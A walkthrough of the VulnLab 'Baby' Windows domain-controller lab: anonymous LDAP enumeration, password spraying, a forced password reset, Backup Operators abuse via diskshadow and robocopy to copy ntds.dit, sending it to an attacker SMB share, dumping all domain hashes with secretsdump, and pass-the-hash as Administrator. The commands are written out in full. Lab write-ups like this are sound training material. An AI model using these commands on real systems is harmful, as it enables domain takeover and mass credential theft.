BABY – VULNLAB

This is the Write-up/Walkthrough of the BABY Machine from VULNLAB.

NMAP SCAN:

53/tcp   open  domain        syn-ack Simple DNS Plus
88/tcp   open  kerberos-sec  syn-ack Microsoft Windows Kerberos (server time: 2023-08-12 06:36:42Z)
135/tcp  open  msrpc         syn-ack Microsoft Windows RPC
139/tcp  open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
389/tcp  open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: baby.vl0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds? syn-ack
464/tcp  open  kpasswd5?     syn-ack
593/tcp  open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped    syn-ack
3268/tcp open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: baby.vl, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped    syn-ack
3389/tcp open  ms-wbt-server syn-ack Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: BABY
|   NetBIOS_Domain_Name: BABY
|   NetBIOS_Computer_Name: BABYDC
|   DNS_Domain_Name: baby.vl
|   DNS_Computer_Name: BabyDC.baby.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2023-08-12T06:36:52+00:00
|_ssl-date: 2023-08-12T06:37:31+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=BabyDC.baby.vl
| Issuer: commonName=BabyDC.baby.vl

Domain: baby.vl, NetBIOS computer name: BABYDC (DNS name BabyDC.baby.vl). DNS, Kerberos and LDAP on one host mean this is the domain controller; Product_Version 10.0.20348 is Windows Server 2022.

I tried SMB first, but an anonymous (null) session was not allowed, so I moved on to LDAP and enumerated the domain with ldapsearch using a blank bind DN and password (anonymous bind):

ldapsearch -x -H ldap://10.10.92.79 -D '' -w '' -b "DC=baby,DC=vl" > ldap_search

In the output, the description attribute of the user teresa.bell contains a password. The description field is readable by anyone who can bind, including an anonymous bind, so it is always worth grepping for on a new domain.

Next, extract the names from the dn lines, then convert the display names to the domain's username format: "John Doe" becomes john.doe (lowercase, the space replaced by a dot). Entries that are not user accounts (groups, built-in containers and so on) are removed from the resulting list by hand.

grep '^dn:' ldap_search | grep -o 'CN=[^,]*' | cut -d= -f2 | tr ' ' '.' | tr 'A-Z' 'a-z' > usernames.txt

Then I used crackmapexec to spray the found password against the whole user list (one password, many accounts, so the lockout threshold is not a concern):

crackmapexec smb 10.10.92.79 -u usernames.txt -p 'BabyStart123!'

No account accepted the password as it is, but crackmapexec reported STATUS_PASSWORD_MUST_CHANGE for caroline.robinson: the credential is correct, the account simply has to set a new password before it can log in. smbpasswd can do that remotely over SMB, so I used it to change the password of caroline.robinson:

smbpasswd -r 10.10.92.79 -U caroline.robinson

Enter the found password as the old SMB password, then set the new password for caroline.robinson (it has to satisfy the domain password policy).

After that I connected as caroline.robinson with evil-winrm using the new password and got the user flag:

evil-winrm -u caroline.robinson -p 'hacker@123' -i 10.10.92.79

caroline.robinson is a member of the Backup Operators group. That grants SeBackupPrivilege and SeRestorePrivilege: any file on the system can be read when the read is done with backup semantics, regardless of its ACL, and any file can be written with restore semantics. On a domain controller that includes ntds.dit, which holds every account's password hash.

net user caroline.robinson /domain
whoami /all
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

Create a diskshadow script (kunal.dsh) with the commands that snapshot C: and expose the snapshot as Z:. diskshadow does not parse a file with Unix line endings, so the file has to be converted to CRLF with unix2dos before it is uploaded. Contents of kunal.dsh (lines starting with # are comments):

# keep the shadow copy after diskshadow exits, and do not involve VSS writers
set context persistent nowriters
# snapshot the C: volume and refer to it as %kunal%
add volume c: alias kunal
create
# mount the snapshot as drive Z:
expose %kunal% z:

Convert the line endings on the Linux side before uploading:

unix2dos kunal.dsh

Upload the file with evil-winrm's upload command and run diskshadow with it to create the shadow copy of C: and expose it as Z:

diskshadow /s kunal.dsh

The snapshot of C: is now exposed as Z:. The live ntds.dit under C:\Windows\NTDS is locked by the directory service, but the copy in the snapshot is not, and robocopy /B (backup mode) reads it through SeBackupPrivilege regardless of its ACL:

robocopy /B Z:\Windows\NTDS . ntds.dit

Pulling ntds.dit with evil-winrm's download command failed, so I started an SMB server with impacket-smbserver on my Linux machine and copied ntds.dit to it instead.

Start the SMB server on Linux, sharing the current directory under the name "share". Note that this share is unauthenticated and writable by anyone who can reach it; on a real engagement add -username and -password and map the share with net use first.

impacket-smbserver -smb2support share .

copying the ntds.dit file.

copy ntds.dit \\YOUR-TUNNEL-IP\share\ntds.dit

secretsdump from impacket can extract the hashes from ntds.dit, but it also needs the SYSTEM registry hive, because the boot key stored there is what decrypts the hashes. Save the hive from the registry (SeBackupPrivilege covers this as well):

reg save hklm\system system.hive

Copy system.hive to the Linux machine the same way, then run secretsdump offline. It prints the NT hashes of every domain account, not only Administrator.

impacket-secretsdump -ntds ntds.dit -system system.hive local

With the NT hash of Administrator from the secretsdump output, evil-winrm can authenticate with pass-the-hash (-H) instead of a password:

evil-winrm -u administrator -H ee4457ae59f1e3fbd764e33d9cef123d -i 10.10.88.6

If you face any problems, let me know in the comment.
